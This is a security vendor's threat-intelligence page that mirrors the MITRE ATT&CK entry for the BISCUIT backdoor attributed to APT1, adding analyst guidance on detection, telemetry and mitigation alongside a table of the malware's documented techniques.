Live Active security incident? Get immediate response
MITRE ATT&CK® Malware

S0017: BISCUIT

BISCUIT is a backdoor that has been used by APT1 since as early as 2007. [1]

EnterpriseS0017MalwareObject v1.3 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

BISCUIT matters because ATT&CK records it as a Windows backdoor associated with long-running APT1 activity. For leaders, the practical issue is not the malware name alone; it is the behavior pattern: command-and-control resilience, discovery of users/systems/processes, command execution, file transfer, keylogging, and screen capture. Those behaviors can turn one compromised Windows endpoint into a source of credential exposure, internal reconnaissance, and sustained remote access.

Executive priority

Treat BISCUIT as a coverage-validation use case for post-compromise Windows backdoor activity. Security leaders should ask whether SOC, IR, and audit teams can prove visibility into command shell execution, discovery commands, suspicious inbound tool transfer, encrypted or fallback command-and-control, and collection behaviors such as keylogging or screenshots. Because MITRE provides no official detection text for this object, priority should be on validating control and telemetry readiness rather than assuming existing tools detect this malware family by name.

Technical view

ATT&CK lists BISCUIT as Windows malware and relates it to APT1 usage plus techniques including Fallback Channels, System Owner/User Discovery, Keylogging, Process Discovery, Windows Command Shell, System Information Discovery, Ingress Tool Transfer, Screen Capture, System Time Discovery, and Asymmetric Cryptography. SOC and IR teams should map detections to those behaviors rather than only to signatures. Validate endpoint process telemetry for cmd.exe usage and discovery activity, host evidence of screen/keylogging-like collection, file creation or transfer events consistent with tool ingress, and network telemetry that can expose unusual command-and-control patterns, including alternate channels and encrypted traffic metadata.

Likely telemetry

  • Windows endpoint process creation and command-line telemetry
  • Parent-child process relationships involving Windows command shell execution
  • User, process, system information, and system time discovery evidence
  • Endpoint file creation, download, and transfer events
  • Network connection metadata for outbound command-and-control patterns

Detection direction

  • Build behavior-based analytic coverage around the related ATT&CK techniques instead of relying only on a BISCUIT malware name or hash.
  • Correlate discovery commands, command shell execution, file transfer, and outbound network activity from the same Windows host or user context.
  • Review false positives from administrators, software deployment tools, remote support utilities, and monitoring agents that may legitimately perform discovery or file transfer.
  • Pay special attention to visibility gaps created by encrypted command-and-control and fallback channels; network metadata and endpoint correlation are likely more useful than content inspection alone.
  • Because official detection guidance is not provided, require local testing or purple-team validation to confirm whether existing EDR, SIEM, proxy, and firewall data can support investigations.

Mitigation priorities

  • Prioritize endpoint hardening and monitoring on Windows systems where this object is applicable.
  • Limit unnecessary command shell use through least privilege, application control, and administrative process governance where operationally feasible.
  • Strengthen egress monitoring and control so unauthorized outbound channels and tool transfers are harder to sustain.
  • Protect credentials and user sessions because related behavior includes keylogging and user discovery.
  • Prepare IR playbooks for backdoor containment that include host isolation, credential review, evidence preservation, and network indicator scoping.
Analyst notes and limits

The strongest decision value is in the relationships: BISCUIT is a Windows backdoor tied to APT1 in ATT&CK and mapped to command-and-control, discovery, execution, collection, and credential-access behaviors. This supports a practical defensive test plan across endpoint, identity, and network monitoring without making unsupported claims about current activity or customer exposure.

MITRE provides a short description and no official detection text for BISCUIT. The supplied object does not include aliases, labels, or detailed procedures. Some related technique platform lists are broader than the BISCUIT platform field, so this take treats BISCUIT itself as Windows-focused and uses related techniques only for behavior-mapping. Local environment telemetry is required to determine actual coverage.

Official MITRE ATT&CK definition

BISCUIT

BISCUIT is a backdoor that has been used by APT1 since as early as 2007. [1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

10 rows
Domain ID Name Relationship / procedure
Enterprise T1113 Screen Capture

BISCUIT has a command to periodically take screenshots of the system.CitationMandiant APT1 Appendix
Enterprise T1008 Fallback Channels

BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server.CitationMandiant APT1CitationMandiant APT1 Appendix
Enterprise T1082 System Information Discovery

BISCUIT has a command to collect the processor type, operation system, computer name, and whether the system is a laptop or PC.CitationMandiant APT1
Enterprise T1124 System Time Discovery

BISCUIT has a command to collect the system `UPTIME`.CitationMandiant APT1
Enterprise T1057 Process Discovery

BISCUIT has a command to enumerate running processes and identify their owners.CitationMandiant APT1 Appendix
Enterprise T1105 Ingress Tool Transfer

BISCUIT has a command to download a file from the C2 server.CitationMandiant APT1 Appendix
Enterprise T1056.001 Keylogging Sub-technique

BISCUIT can capture keystrokes.CitationMandiant APT1 Appendix
Enterprise T1573.002 Asymmetric Cryptography Sub-technique

BISCUIT uses SSL for encrypting C2 communications.CitationMandiant APT1 Appendix
Enterprise T1033 System Owner/User Discovery

BISCUIT has a command to gather the username from the system.CitationMandiant APT1 Appendix
Enterprise T1059.003 Windows Command Shell Sub-technique

BISCUIT has a command to launch a command shell on the system.CitationMandiant APT1 Appendix
Associated objects

Groups, software, and campaigns

Group Enterprise

G0006: APT1

APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. [1]

Relationship explorer

All related ATT&CK context

uses · Group G0006: APT1 Enterprise uses · Technique T1113: Screen Capture Enterprise uses · Technique T1008: Fallback Channels Enterprise uses · Technique T1082: System Information Discovery Enterprise uses · Technique T1124: System Time Discovery Enterprise uses · Technique T1057: Process Discovery Enterprise uses · Technique T1105: Ingress Tool Transfer Enterprise uses · Technique T1056.001: Keylogging Enterprise uses · Technique T1573.002: Asymmetric Cryptography Enterprise uses · Technique T1033: System Owner/User Discovery Enterprise uses · Technique T1059.003: Windows Command Shell Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.3
Created
Modified
Raw hash
23561972bdec14ab...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.3 Current bundle 23561972bdec…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Mandiant APT1

    Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.

    Open source URL
  2. [2]
    BISCUIT

    (Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)

  3. [3]
    Mandiant APT1 Appendix

    Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.

    Open source URL
  4. [4]
    mitre-attack S0017
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use